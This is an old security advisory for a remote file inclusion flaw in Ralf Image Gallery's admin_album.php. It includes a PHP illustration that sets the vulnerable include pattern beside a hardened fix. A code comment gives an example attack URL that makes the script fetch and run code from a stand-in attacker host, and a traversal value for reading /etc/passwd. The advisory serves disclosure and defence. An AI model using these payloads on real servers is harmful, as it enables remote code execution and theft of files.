Ralf Image Gallery admin_album.php Multiple Variable Remote File Inclusion

2006-06-20T11:19:03
ID OSVDB:26754
Type osvdb
Reporter David "Aesthetico" Vieira-Kurz (admin@majorsecurity.de)
Modified 2006-06-20T11:19:03

Description

Vulnerability Description

Ralf Image Gallery (R.I.G.) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin_album.php script not properly sanitizing user input supplied to the 'dir_abs_src' or 'dir_abs_admin_src' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Additionally, the same unsanitized parameters can be used to read arbitrary local files via directory traversal style attacks (../../), or to conduct cross-site scripting (XSS) attacks that execute arbitrary script in a user's browser within the trust relationship between the browser and the server.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on', since that is what lets a request parameter populate the 'dir_abs_src' and 'dir_abs_admin_src' variables before the script runs. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Remote inclusion additionally requires the PHP configuration to permit URL wrappers in include statements (allow_url_fopen on PHP 5.1 and earlier; allow_url_include, introduced in PHP 5.2.0, on later versions); local file inclusion via directory traversal does not depend on that setting.
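The following is an added illustration, not code from R.I.G. or from the advisory: it reconstructs the register_globals include pattern that the description implies (the actual contents of admin_album.php are not reproduced here) and places a hardened replacement beside it. The host name attacker.example, the included file names, and the helper safe_include_dir() are assumptions for the example.

```php
<?php
// Added illustration (not R.I.G.'s source): the register_globals include
// pattern behind this advisory, beside a hardened replacement.
//
// With register_globals=On, PHP creates $dir_abs_src from the request before
// the script runs, e.g. (hypothetical host):
//   admin_album.php?dir_abs_src=http://attacker.example/code.txt%3F
// The trailing "?" turns the "/functions.php" appended below into a query
// string, so the include fetches and executes the remote file (when
// allow_url_fopen / allow_url_include permit it). A value such as
// ../../../../etc/passwd%00 reads local files instead.

// Vulnerable pattern (do not use).
function vulnerable_include()
{
    global $dir_abs_src, $dir_abs_admin_src;   // request-controlled under register_globals=On
    include $dir_abs_src . '/functions.php';
    include $dir_abs_admin_src . '/admin_functions.php';
}

// Hardened pattern: include paths are constants fixed at install time and are
// never derived from request data. dirname(__FILE__) is used rather than
// __DIR__ so the code also runs on the PHP 4/5.1 installs of this era.
define('DIR_ABS_SRC', dirname(__FILE__) . '/src');
define('DIR_ABS_ADMIN_SRC', dirname(__FILE__) . '/admin');

/**
 * Resolve $candidate and confirm it is an existing directory inside $root.
 * URL wrappers (http://, ftp://, php://, data:) are rejected because
 * realpath() returns false for them; ../ escapes are rejected because the
 * resolved path no longer starts with $root.
 */
function safe_include_dir($candidate, $root)
{
    $root = realpath($root);
    $real = realpath($candidate);
    if ($root === false || $real === false || !is_dir($real)) {
        return false;
    }
    $rootWithSep = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($real . DIRECTORY_SEPARATOR, $rootWithSep) !== 0) {
        return false;   // resolved outside the application root
    }
    return $real;
}

function hardened_include()
{
    $src   = safe_include_dir(DIR_ABS_SRC, dirname(__FILE__));
    $admin = safe_include_dir(DIR_ABS_ADMIN_SRC, dirname(__FILE__));
    if ($src === false || $admin === false) {
        die('Invalid include directory');
    }
    include $src . '/functions.php';
    include $admin . '/admin_functions.php';
}

// Belt and braces: refuse to run at all under the insecure setting, so a
// later change to php.ini cannot silently reintroduce the exposure.
if (ini_get('register_globals')) {
    die('register_globals must be Off');
}
```

The safe_include_dir() check is what a reviewer should look for in any code that still builds include paths from variables: resolve with realpath(), require the result to sit under a known root, and reject anything realpath() cannot resolve, which covers both remote URLs and traversal sequences.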

Solution Description

Upgrade to version 1.0 or higher, as it has been reported to fix this vulnerability. No vendor workaround is known; note, however, that the flaw depends on register_globals being enabled (see Technical Description), so running PHP with register_globals off, the default since 4.2.0, prevents a request from populating the affected variables.

References:

Vendor URL: http://rig.powerpulsar.com/
Secunia Advisory ID: 20771
Related OSVDB ID: 26753
Related OSVDB ID: 26755
Related OSVDB ID: 26756
Other Advisory URL: http://www.majorsecurity.de/advisory/major_rls18.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0609.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0430.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0577.html
Keyword: MajorSecurity #18
FrSIRT Advisory: ADV-2006-2477
CVE: CVE-2006-3210